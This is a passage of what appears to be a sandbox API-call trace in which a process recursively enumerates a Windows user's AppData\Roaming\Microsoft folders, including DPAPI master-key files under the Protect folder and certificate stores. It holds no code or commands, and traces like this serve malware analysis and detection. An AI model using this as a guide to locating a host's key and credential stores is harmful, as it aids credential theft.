pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook\\*" [0083.620] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.620] PathMatchSpecW (pszFile="Outlook.srs", pszSpec="*") returned 1 [0083.620] PathMatchSpecW (pszFile="Outlook.xml", pszSpec="*") returned 1 [0083.620] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.620] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="PowerPoint" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint" [0083.620] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*" [0083.620] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.620] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.620] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Proof" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof" [0083.620] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof\\*" [0083.620] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.621] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.621] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Protect" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect" [0083.621] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\*" [0083.621] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.621] PathMatchSpecW (pszFile="CREDHIST", pszSpec="*") returned 1 [0083.621] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect", pszFile="S-1-5-21-2345716840-1148442690-1481144037-1000" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000" [0083.621] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*" [0083.621] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.621] PathMatchSpecW (pszFile="1862f3be-4467-4925-a93f-badcfb2203ba", pszSpec="*") returned 1 [0083.621] PathMatchSpecW (pszFile="1a231b4e-0d4b-4bef-bfe5-101dc3660c19", pszSpec="*") returned 1 [0083.621] PathMatchSpecW (pszFile="Preferred", pszSpec="*") returned 1 [0083.621] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.621] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect", pszFile="S-1-5-21-3111613574-2524581245-2586426736-500" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500" [0083.621] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*" [0083.621] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.622] PathMatchSpecW (pszFile="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", pszSpec="*") returned 1 [0083.622] PathMatchSpecW (pszFile="Preferred", pszSpec="*") returned 1 [0083.622] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.622] PathMatchSpecW (pszFile="SYNCHIST", pszSpec="*") returned 1 [0083.622] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.622] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Publisher" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher" [0083.622] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher\\*" [0083.622] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.622] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.622] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Publisher Building Blocks" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0083.623] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*" [0083.623] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.623] PathMatchSpecW (pszFile="ContentStore.xml", pszSpec="*") returned 1 [0083.623] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.623] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Speech" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech" [0083.623] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech\\*" [0083.623] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.624] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.624] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="SystemCertificates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0083.624] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0083.624] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.624] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="My" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0083.624] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0083.624] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.624] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="Certificates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0083.624] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0083.624] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.624] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.624] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CRLs" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0083.625] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0083.625] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.625] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.625] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CTLs" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0083.625] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0083.625] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.625] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.625] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.625] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.625] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Templates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates" [0083.625] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\*" [0083.625] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.625] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates", pszFile="LiveContent" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" [0083.625] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*" [0083.625] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.625] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", pszFile="16" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" [0083.625] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*" [0083.625] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.625] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="Managed" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" [0083.625] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*" [0083.625] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.626] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="Access Parts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts" [0083.626] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\*" [0083.626] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.626] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033" [0083.626] PathCombineW (in: pszDest=0x18c500, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033\\*" [0083.626] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.626] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.626] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.626] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="Document Themes" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" [0083.626] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*" [0083.626] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.626] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" [0083.626] PathCombineW (in: pszDest=0x18c500, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*" [0083.626] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.626] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.626] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.626] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.626] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="User" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" [0083.626] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*" [0083.626] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.627] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", pszFile="Document Themes" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" [0083.627] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*" [0083.627] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.627] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" [0083.627] PathCombineW (in: pszDest=0x18c500, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*" [0083.627] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.627] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.627] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.627] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.627] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.627] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.627] PathMatchSpecW (pszFile="Normal.dotm", pszSpec="*") returned 1 [0083.627] PathMatchSpecW (pszFile="~$Normal.dotm", pszSpec="*") returned 1 [0083.627] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.627] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="UProof" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof" [0083.627] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof\\*") 